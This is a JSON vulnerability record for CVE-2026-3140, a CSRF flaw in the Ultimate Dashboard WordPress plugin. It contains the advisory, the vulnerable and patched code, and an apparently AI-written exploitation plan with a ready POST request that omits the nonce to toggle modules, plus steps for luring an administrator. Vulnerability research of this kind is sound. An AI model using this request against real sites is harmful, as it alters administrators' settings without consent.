[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fKwUs2BH69sCkpgjvtqSAiCDj9J4nmwnrUup00jKs_hs":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-3140","ultimate-dashboard-cross-site-request-forgery-to-module-activationdeactivation","Ultimate Dashboard \u003C= 3.8.14 - Cross-Site Request Forgery to Module Activation\u002FDeactivation","The Ultimate Dashboard plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.8.14. This is due to a flawed nonce validation conditional in the 'handle_module_actions' function. This makes it possible for unauthenticated attackers to toggle plugin modules on or off via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","ultimate-dashboard",null,"\u003C=3.8.14","3.8.15","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Cross-Site Request Forgery (CSRF)","2026-04-30 00:00:00","2026-05-01 11:18:50",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fbbcdb70f-77db-48ab-ae23-c46caecdd3be?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Fcss\u002Fadmin.css","assets\u002Fcss\u002Fheatbox.css","assets\u002Fjs\u002Fnotice-dismissal.js","class-setup.php","modules\u002Fadmin-bar\u002Ftemplates\u002Fmetaboxes\u002Fremove-admin-bar-metabox.php","modules\u002Fadmin-page\u002Fassets\u002Fcss\u002Fedit-admin-page.css","modules\u002Ffeature\u002Fclass-feature-module.php","modules\u002Fonboarding-wizard\u002Fassets\u002Fcss\u002Fonboarding-wizard.css","researched",false,3,"# Exploitation Research Plan: CVE-2026-3140 (Ultimate Dashboard CSRF)\n\n## 1. Vulnerability Summary\nThe **Ultimate Dashboard** plugin (\u003C= 3.8.14) is vulnerable to **Cross-Site Request Forgery (CSRF)** due to a logic error in the nonce validation within the `handle_module_actions` function. The code incorrectly allows requests to proceed if the `nonce` parameter is completely omitted. This allows an attacker to trick an authenticated administrator into activating or deactivating core plugin modules (like White Labeling or the Admin Menu Editor), potentially disrupting site administration or disabling security-related features.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **AJAX Action:** `udb_handle_module_actions`\n*   **Vulnerable Function:** `Udb\\Feature\\Feature_Module::handle_module_actions`\n*   **HTTP Method:** `POST`\n*   **Authentication Required:** Yes (must be triggered by a user with `manage_options` capability via CSRF).\n*   **Payload Parameter:** `name` (module slug) and `status` (`true`\u002F`false`).\n*   **Vulnerability Type:** CSRF via Nonce Bypass (Conditional Logic Flaw).\n\n## 3. Code Flow\n1.  The plugin registers the AJAX action in `modules\u002Ffeature\u002Fclass-feature-module.php`:\n    ```php\n    add_action( 'wp_ajax_udb_handle_module_actions', array( self::get_instance(), 'handle_module_actions' ) );\n    ```\n2.  When a request is sent to `admin-ajax.php` with `action=udb_handle_module_actions`, the `handle_module_actions` function is invoked.\n3.  The function performs a check to validate the nonce:\n    ```php\n    public function handle_module_actions() {\n        if ( empty( $_POST ) || ( ! empty( $_POST['nonce'] ) && ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['nonce'] ) ), 'udb_module_nonce_action' ) ) ) {\n            wp_send_json_error( __( 'Invalid nonce', 'ultimate-dashboard' ) );\n        }\n        \u002F\u002F ...\n    ```\n4.  **Logic Flaw:** The conditional `( ! empty( $_POST['nonce'] ) && ! wp_verify_nonce(...) )` evaluates to `false` if `$_POST['nonce']` is **missing**. \n    - If `nonce` is provided and wrong: `(true && true)` -> Error.\n    - If `nonce` is missing: `(false && ...)` -> Condition fails, the block is skipped, and the code proceeds.\n5.  The function then checks for the user's capability (`manage_options`).\n6.  Finally, it updates the `udb_modules` option:\n    ```php\n    $saved_modules[ $name ] = $status;\n    update_option( 'udb_modules', $saved_modules );\n    ```\n\n## 4. Nonce Acquisition Strategy\n**No nonce is required for exploitation.** \nThe vulnerability exists specifically because the nonce check is bypassed when the `nonce` parameter is absent from the `$_POST` array.\n\n## 5. Exploitation Strategy\nTo demonstrate the CSRF, we will perform a request that disables a visible module (e.g., `white_label`) while authenticated as an administrator.\n\n### Step-by-Step Plan:\n1.  **Preparation:** Ensure the administrator is logged in.\n2.  **Payload Injection:** Issue a `POST` request to `admin-ajax.php` without a `nonce` parameter.\n3.  **Target Module:** `white_label`.\n4.  **Target Status:** `false` (to deactivate).\n\n### HTTP Request (via `http_request` tool):\n```json\n{\n  \"method\": \"POST\",\n  \"url\": \"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php\",\n  \"headers\": {\n    \"Content-Type\": \"application\u002Fx-www-form-urlencoded\"\n  },\n  \"body\": \"action=udb_handle_module_actions&name=white_label&status=false\"\n}\n```\n\n## 6. Test Data Setup\n1.  **Plugin State:** Ensure `Ultimate Dashboard` version \u003C= 3.8.14 is installed and active.\n2.  **Initial Configuration:** By default, modules are enabled. We can verify this by checking the database option `udb_modules`.\n3.  **Administrator Session:** The `http_request` must include valid admin cookies to simulate a CSRF attack success.\n\n## 7. Expected Results\n*   The server should respond with: `{\"success\":true,\"data\":{\"message\":\"Saved\"}}`.\n*   If the exploit fails due to a fixed version, it would respond with an error related to \"Invalid nonce\" (though in this specific logic bug, the fixed version likely changed the `||` logic).\n\n## 8. Verification Steps\nAfter sending the HTTP request, verify the module status using `wp-cli`:\n```bash\n# Check the value of the udb_modules option\nwp option get udb_modules --format=json\n```\n**Success Condition:** The JSON output should show `\"white_label\":\"false\"`.\n\n## 9. Alternative Approaches\nIf the `white_label` module is already disabled, target a different module identifier found in `class-setup.php`:\n*   `login_customizer`\n*   `login_redirect`\n*   `admin_pages`\n*   `admin_menu_editor`\n*   `admin_bar_editor`\n\nExample for `admin_menu_editor`:\n`action=udb_handle_module_actions&name=admin_menu_editor&status=false`","The Ultimate Dashboard plugin for WordPress (\u003C= 3.8.14) is vulnerable to Cross-Site Request Forgery (CSRF) because the module activation handler contains a flawed nonce check that is bypassed when the nonce parameter is missing. This allows an attacker to trick a site administrator into activating or deactivating core plugin modules, such as White Labeling or the Admin Menu Editor, by clicking on a malicious link.","\u002F\u002F modules\u002Ffeature\u002Fclass-feature-module.php line 117\npublic function handle_module_actions() {\n\n\tif ( empty( $_POST ) || ( ! empty( $_POST['nonce'] ) && ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['nonce'] ) ), 'udb_module_nonce_action' ) ) ) {\n\t\twp_send_json_error( __( 'Invalid nonce', 'ultimate-dashboard' ) );\n\t}\n\n---\n\n\u002F\u002F class-setup.php line 452\npublic function dismiss_review_notice() {\n\n\tif ( empty( $_POST['dismiss'] ) ) {\n\t\twp_send_json_error( 'Invalid Request' );\n\t}\n\n\tupdate_option( 'review_notice_dismissed', 1 );\n\twp_send_json_success( 'Review notice has been dismissed.' );\n\n}","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fultimate-dashboard\u002F3.8.14\u002Fclass-setup.php\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fultimate-dashboard\u002F3.8.15\u002Fclass-setup.php\n@@ -452,12 +460,18 @@\n \tpublic function dismiss_review_notice() {\n \n+\t\t$nonce = isset( $_POST['nonce'] ) ? sanitize_text_field( wp_unslash( $_POST['nonce'] ) ) : '';\n+\n+\t\tif ( ! wp_verify_nonce( $nonce, 'udb_dismiss_notice' ) ) {\n+\t\t\twp_send_json_error( __( 'Invalid token', 'ultimate-dashboard' ) );\n+\t\t}\n+\n \t\tif ( empty( $_POST['dismiss'] ) ) {\n-\t\t\twp_send_json_error( 'Invalid Request' );\n+\t\t\twp_send_json_error( __( 'Invalid request', 'ultimate-dashboard' ) );\n \t\t}\n \n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fultimate-dashboard\u002F3.8.14\u002Fmodules\u002Ffeature\u002Fclass-feature-module.php\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fultimate-dashboard\u002F3.8.15\u002Fmodules\u002Ffeature\u002Fclass-feature-module.php\n@@ -117,8 +117,10 @@\n \t *\u002F\n \tpublic function handle_module_actions() {\n \n-\t\tif ( empty( $_POST ) || ( ! empty( $_POST['nonce'] ) && ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['nonce'] ) ), 'udb_module_nonce_action' ) ) ) {\n-\t\t\twp_send_json_error( __( 'Invalid nonce', 'ultimate-dashboard' ) );\n+\t\t$nonce = isset( $_POST['nonce'] ) ? sanitize_text_field( wp_unslash( $_POST['nonce'] ) ) : '';\n+\n+\t\tif ( ! wp_verify_nonce( $nonce, 'udb_module_nonce_action' ) ) {\n+\t\t\twp_send_json_error( __( 'Invalid token', 'ultimate-dashboard' ) );\n \t\t}","1. Identify the target module to toggle (e.g., 'white_label' or 'admin_menu_editor').\n2. Construct a CSRF payload targeting the WordPress AJAX endpoint '\u002Fwp-admin\u002Fadmin-ajax.php'.\n3. Format the POST request with the following parameters: 'action=udb_handle_module_actions', 'name=[module_slug]', and 'status=[true\u002Ffalse]'.\n4. Crucially, omit the 'nonce' parameter entirely from the POST body to exploit the logic flaw in handle_module_actions() that skips verification when the nonce is absent.\n5. Trick an authenticated administrator with 'manage_options' capabilities into visiting a malicious site or clicking a link that triggers this background request via an auto-submitting form or script.","gemini-3-flash-preview","2026-05-04 17:45:51","2026-05-04 17:46:11",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","3.8.14","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fultimate-dashboard\u002Ftags\u002F3.8.14","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fultimate-dashboard.3.8.14.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fultimate-dashboard\u002Ftags\u002F3.8.15","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fultimate-dashboard.3.8.15.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fultimate-dashboard\u002Ftags"]